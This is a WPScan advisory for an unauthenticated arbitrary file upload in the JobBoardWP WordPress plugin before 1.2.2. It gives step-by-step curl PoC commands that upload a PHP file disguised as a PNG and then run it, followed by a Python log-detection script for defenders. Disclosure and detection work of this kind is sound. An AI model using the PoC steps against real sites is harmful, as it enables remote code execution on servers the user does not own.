wpvulndb / Cydave / WPVDB-ID:FEC68E6E-F612-43C8-8301-80F7AE3BE665
History: Nov 28, 2022 - 12:00 a.m.

JobBoardWP < 1.2.2 - Unauthenticated Arbitrary File Upload

2022-11-28 00:00:00
cydave
wpscan.com
4
file validation bypass
unauthenticated upload
php payload vulnerability
jobboardwp plugin
security exploit.

EPSS

0.001

Percentile

46.6%

The plugin does not properly validate file names and types in its file upload functionalities, allowing unauthenticated users to upload arbitrary files such as PHP.

PoC

Setup:

1. Install the vulnerable plugin (jobboardwp version 1.2.1)
2. In the toast message that appears on the plugin’s installation page, create the required pages for the plugin to work properly

Attack:

1. As an unauthenticated user, extract the nonce from the “Jobs” page (by default /?page_id=5), CTRL+F for “jb_front_data”
2. Prepare a payload you want to upload, ensure that the filename ends with “.png”:

   echo '' > /tmp/payload.png

3. Invoke the following curl command, with the nonce embedded, to upload the payload:

   curl 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=jb-upload-company-logo' \
     -H 'Cookie: jb-logo-upload=payload.php' \
     -F 'nonce=' \
     -F 'chunks=1' \
     -F 'file=@/tmp/payload.png'

4. Trigger the payload by accessing it (the location of the payload is returned by the curl command above):

   curl 'http://127.0.0.1:7777/wp-content/uploads/jobboardwp/temp/payload.php'
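For defenders, the two requests in the PoC leave a recognisable pair in web server access logs: a POST to the `jb-upload-company-logo` AJAX action, then a successful fetch of a non-image file from the plugin's temp upload directory. The following detection sketch is an added example, not part of the original advisory or the plugin's code; the Combined Log Format, the allowed image extensions and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_ACTION = "jb-upload-company-logo"            # action named in the advisory
TEMP_DIR = "/wp-content/uploads/jobboardwp/temp/"   # upload location in the advisory
IMAGE_EXTS = {"png", "jpg", "jpeg", "gif"}          # assumption: valid logo types

def classify(line):
    """Return (ip, kind, target) for a request worth reviewing, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = unquote(url.path).lower()
    # Only the query string is visible in access logs, as in the PoC request.
    if m["method"] == "POST" and path.endswith("/wp-admin/admin-ajax.php"):
        if UPLOAD_ACTION in parse_qs(url.query).get("action", []):
            return (m["ip"], "upload", m["target"])
    if path.startswith(TEMP_DIR) and m["status"] == "200":
        name = path.rsplit("/", 1)[-1]
        ext = name.rsplit(".", 1)[-1] if "." in name else ""
        if name and ext not in IMAGE_EXTS:
            return (m["ip"], "non_image_in_temp", m["target"])
    return None

def scan(lines):
    """Return (findings, IPs that uploaded and later fetched a non-image)."""
    findings = [f for f in map(classify, lines) if f]
    uploaders, chained = set(), []
    for ip, kind, _ in findings:
        if kind == "upload":
            uploaders.add(ip)
        elif ip in uploaders and ip not in chained:
            chained.append(ip)
    return findings, chained

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [28/Nov/2022:10:00:01 +0000] "GET /?page_id=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [28/Nov/2022:10:00:09 +0000] "POST /wp-admin/admin-ajax.php?action=jb-upload-company-logo HTTP/1.1" 200 210',
    '198.51.100.7 - - [28/Nov/2022:10:00:15 +0000] "GET /wp-content/uploads/jobboardwp/temp/payload.php HTTP/1.1" 200 12',
    '203.0.113.20 - - [28/Nov/2022:10:02:00 +0000] "POST /wp-admin/admin-ajax.php?action=jb-upload-company-logo HTTP/1.1" 200 198',
    '203.0.113.20 - - [28/Nov/2022:10:02:03 +0000] "GET /wp-content/uploads/jobboardwp/temp/logo_a1.png HTTP/1.1" 200 48211',
    '203.0.113.9 - - [28/Nov/2022:10:03:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60',
]
```

An `upload` finding on its own can be a legitimate logo upload; the IPs returned in the second value of `scan(SAMPLE)` are the ones that match both halves of the PoC sequence.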
